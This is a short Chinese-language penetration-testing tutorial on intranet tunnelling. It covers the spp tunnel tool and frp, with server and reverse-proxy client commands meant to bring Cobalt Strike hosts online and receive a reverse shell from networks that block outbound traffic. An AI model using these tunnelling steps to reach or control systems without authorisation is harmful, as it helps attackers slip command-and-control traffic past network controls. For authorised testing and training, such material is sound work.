内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透
目录
内网穿透:解决网络控制上线&网络通讯问题
隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)
代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)
spp隧道代理工具
支持的协议:
TCP、UDP、RUDP(可靠 UDP)、RICMP(可靠 ICMP)、RHTTP(可靠 HTTP)、KCP、Quic
支持类型:
正向代理、反向代理、SOCKS5正向代理、SOCKS5反向代理
协议和类型可以自由组合
外部代理协议和内部转发协议可以自由组合
spp工作原理图
spp详解以及下载地址:
https://github.com/esrrhs/spp/tree/0.6
cs上线主机
spp代理通信
本工具使用简单,服务器、客户机各一条命令,就可建立连接。
服务端配置
chmod +x spp ##添加执行权限
./spp -type server -proto tcp -listen :8888 ##启动spp,并设置为服务端,通信协议为tcp,监控本地的8888端口。
客户端配置
chmod +x spp ##添加执行权限
./spp -name "sx" -type reverse_proxy_client -server 服务器ip地址:8888 -fromaddr :7777 -toaddr :6666 -proxyproto tcp ## 设置一个名字(自定义即可),连接服务器的IP地址及端口,将服务器的端口7777映射到本地的端口6666上,设置通信协议为tcp。
服务端可进行查看连接状态
CS配置
CS需要设置两个监听器,一个用于生成木马,一个用于接收反弹shell。